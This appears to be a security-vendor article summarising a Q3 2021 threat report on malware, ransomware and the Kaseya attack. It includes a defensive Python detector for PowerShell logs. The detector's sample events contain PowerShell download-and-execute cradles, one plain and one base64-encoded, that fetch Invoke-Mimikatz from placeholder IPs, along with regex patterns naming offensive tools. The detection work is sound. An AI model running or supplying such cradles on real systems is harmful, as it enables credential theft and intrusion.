
Endpoint Malware and Ransomware Volume Already Exceeded 2020 Totals by the End of Q3 2021

By Corey Nachreiner, CSO, WatchGuard Technologies

Today’s cybersecurity landscape is constantly evolving, and threat actors target users with increasingly sophisticated and complex attacks. To help both security professionals and everyday Internet users understand the current state of these threats, WatchGuard publishes a quarterly Internet Security Report (ISR). This article summarizes the Q3 2021 edition, which covers the latest malware and network attack trends.

The most striking statistic in the report is that by the end of the third quarter of 2021, endpoint malware and ransomware detections had already exceeded the totals for all of 2020. The WatchGuard Threat Lab also found that a significant share of malware continues to arrive over encrypted connections, as it did in the previous quarter. With most people still working in hybrid or remote models, organizations are moving beyond traditional perimeter-based approaches toward layered security and zero trust. Here are some of the key findings from the Q3 ISR.

  • Nearly half of zero-day malware is now delivered over encrypted connections. – While zero-day malware (malware that evades signature-based detection) rose a modest 3% in Q3, to 67.2% of total malware, the proportion of malware arriving over Transport Layer Security (TLS) jumped from 31.6% to 47%. A smaller share of the encrypted zero-days is considered advanced, but the trend is still concerning: WatchGuard’s data shows that many organizations do not decrypt these connections and therefore have poor visibility into how much malware is entering their networks.
  • As users upgrade to the latest versions of Microsoft Windows and Office, attackers are focusing on newer vulnerabilities. – Unpatched vulnerabilities in older software remain a rich hunting ground, but attackers are also exploiting flaws in newer versions of popular Microsoft products. In Q3, CVE-2018-0802, which exploits a vulnerability in Microsoft Office’s Equation Editor, entered WatchGuard’s top 10 gateway antivirus malware list by volume at sixth place, after appearing on the most widespread malware list in the previous quarter. In addition, two Windows code injectors (Win32/Heim.D and Win32/Heri) took first and sixth places respectively on the most widespread malware list.
  • Attackers disproportionately targeted the Americas. – The overwhelming majority of network attacks in Q3 targeted the Americas (64.5%), compared with Europe (15.5%) and APAC (20%).
  • Overall network attack detections returned to a more normal trajectory, but still pose significant risk. – WatchGuard’s Intrusion Prevention Service (IPS) detected approximately 4.1 million unique network exploits in the third quarter, following more than 20% quarter-over-quarter growth in the preceding quarters. The 21% decline brought volume back to Q1 levels, which were still elevated compared to the previous year. The shift does not necessarily mean adversaries are letting up; they may instead be moving toward more targeted attacks.
  • The top 10 network attack signatures account for the majority of attacks. – Of the 4,095,320 hits detected by IPS in Q3, 81% were attributed to the top 10 signatures. The only new signature in the top 10 for Q3 was ‘WEB Remote File Inclusion /etc/passwd’ (1054837), which targets older but still popular Microsoft Internet Information Services (IIS) web servers. One signature (1059160), a SQL injection, has held the top spot on the list since Q2 2019.
  • Scripting attacks on endpoints continue at a record pace. – By the end of Q3, WatchGuard’s AD360 threat intelligence and WatchGuard Endpoint Protection, Detection and Response (EPDR) had already identified 10% more attack scripts than in all of 2020 (2020 itself was a 666% increase over the prior year). As the hybrid workforce becomes the rule rather than the exception, vigilance alone is no longer enough to block threats. Cybercriminals have many ways to attack endpoints, from application exploits to script-based living-off-the-land attacks, and even attackers with limited skills can use scripting tools such as PowerSploit, PowerWare and Cobalt Strike to fully execute malware payloads while evading basic endpoint detection.
  • Normally secure domains can also be compromised. – A protocol flaw in Microsoft Exchange Server’s Autodiscover system could allow an attacker to harvest domain credentials and compromise several commonly trusted domains. Overall, WatchGuard Fireboxes blocked 5.6 million malicious domains in Q3, including several new malware domains that attempt to install cryptomining software, keyloggers and remote access Trojans (RATs), as well as phishing domains masquerading as SharePoint sites to harvest Office 365 login credentials. Although down 23% from the previous quarter, the number of blocked domains remains many times higher than in Q4 2020 (1.3 million). This highlights the critical need for organizations to keep servers, databases, websites and systems patched and up to date to limit the vulnerabilities attackers can exploit.
  • Ransomware, ransomware, ransomware – Endpoint ransomware detections declined sharply in 2020, but by the end of September 2021 they had already reached 105% of the 2020 total (as WatchGuard predicted at the end of the previous quarter) and were on track to reach 150% once full-year data is analyzed. Ransomware-as-a-service operations such as REvil and GandCrab continue to lower the bar for criminals with little or no coding skill, providing the infrastructure and malware payloads needed to conduct attacks globally in exchange for a percentage of the ransom.
  • The top security incident of the quarter, Kaseya, is another example of the continuing threat of digital supply chain attacks. – Just before the start of the long US Independence Day holiday weekend in July, dozens of organizations began reporting ransomware attacks on their endpoints. WatchGuard’s incident analysis showed that attackers running the REvil ransomware-as-a-service (RaaS) operation used Kaseya VSA Remote Monitoring and Management (RMM) software to deploy ransomware to approximately 1,500 organizations and potentially millions of endpoints. Although the FBI eventually compromised REvil’s servers and obtained the decryption key months later, the attack is a reminder that organizations should adopt zero-trust principles, apply least privilege to vendor access, and keep systems patched and updated to minimize the impact of supply chain attacks.
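The scripting-attacks finding above notes that PowerSploit-style tooling can execute payloads while slipping past basic endpoint detection. As an added example (my own code, not WatchGuard’s product logic or telemetry), the following Python snippet shows the kind of check a defender can run over PowerShell ScriptBlock logging events: it unwraps an -EncodedCommand argument (base64 over UTF-16LE, the form PowerShell expects), re-scans the decoded script, and flags download cradles, Invoke-Expression, known PowerSploit module names and stealth switches. The log line format, the sample events and the indicator names are all constructed for this example; the IP addresses are documentation ranges.

```python
import base64
import re
from typing import Dict, List

# Indicators typical of script-based living-off-the-land tooling.
# The labels are my own, not WatchGuard signature names or IDs.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)(New-Object\s+(System\.)?Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)"
    ),
    "invoke_expression": re.compile(r"(?i)\b(IEX|Invoke-Expression)\b"),
    "offensive_module": re.compile(
        r"(?i)(PowerSploit|Invoke-Mimikatz|Invoke-Shellcode|PowerView|Invoke-ReflectivePEInjection)"
    ),
    "stealth_switches": re.compile(
        r"(?i)(-W(?:indowStyle)?\s+Hidden|-NoP(?:rofile)?\b|-Exec(?:utionPolicy)?\s+Bypass)"
    ),
}

# PowerShell accepts -e, -ec, -enc or -EncodedCommand followed by base64 text.
ENCODED_CMD = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(text: str):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_CMD.search(text)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def score_script_block(text: str) -> Dict[str, object]:
    """Label one script block with the indicators it trips, unwrapping -EncodedCommand first."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded_command")
        # The raw base64 hides the cradle; only the decoded script reveals it.
        hits += [f"decoded:{name}" for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"hits": hits, "decoded": decoded}


def scan_events(events: List[str]) -> List[Dict[str, object]]:
    """Run the scoring over ScriptBlock log lines and return only the ones that tripped an indicator."""
    results = []
    for line in events:
        # Constructed log format for this example: "<EventID> ScriptBlockText: <script>"
        _, _, script = line.partition("ScriptBlockText: ")
        verdict = score_script_block(script)
        if verdict["hits"]:
            results.append({"event": line, **verdict})
    return results


def encode_command(script: str) -> str:
    """Produce the base64(UTF-16LE) form PowerShell expects after -EncodedCommand (used to build sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events in the style of PowerShell Event ID 4104; not real telemetry.
SAMPLE_EVENTS = [
    "4104 ScriptBlockText: Get-ChildItem C:\\Users\\alice\\Documents",
    "4104 ScriptBlockText: IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/Invoke-Mimikatz.ps1')",
    "4104 ScriptBlockText: powershell.exe -NoP -W Hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
    "4104 ScriptBlockText: Get-Process | Where-Object { $_.CPU -gt 100 }",
]

if __name__ == "__main__":
    for r in scan_events(SAMPLE_EVENTS):
        print(r["hits"], "<-", r["event"][:80])
```

Only two of the four constructed events trip an indicator: the plain-text cradle and the encoded one. Without the decoding step the third event would show nothing but the stealth switches, which is exactly the gap attackers rely on when they hide a cradle behind -EncodedCommand; this is why ScriptBlock logging (which records the decoded script) is worth more to defenders than command-line logging alone.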

The third quarter saw a rise in malware per device, the first increase since the pandemic began. Looking at 2021 as a whole, it is clear that cybersecurity continues to challenge users and organizations alike. Rather than reacting to short-term ups and downs, organizations should focus on the ongoing trends that affect their security posture. A strong cybersecurity strategy includes endpoint protection, multi-factor authentication and secure Wi-Fi; implemented properly, these measures significantly mitigate external threats.

About the author

Corey Nachreiner is Chief Security Officer at WatchGuard Technologies. A front-line cybersecurity expert for nearly two decades, Corey regularly contributes to security publications and speaks internationally at major industry trade shows such as RSA. He has written thousands of security alerts and educational articles and contributes daily videos and content on the latest security threats, news and best practices to WatchGuard’s Secplicity community. A Certified Information Systems Security Professional (CISSP), Corey enjoys “modding” every tech gadget he can get his hands on. Corey can be reached on Twitter at @SecAdept or via https://www.watchguard.com.

